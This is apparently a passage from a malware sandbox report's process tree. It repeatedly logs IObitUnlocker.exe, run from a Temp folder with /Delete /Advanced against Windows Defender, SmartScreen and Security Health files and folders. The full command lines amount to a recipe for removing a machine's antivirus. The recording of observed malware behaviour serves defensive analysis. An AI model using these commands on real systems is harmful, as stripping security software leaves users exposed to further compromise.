Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 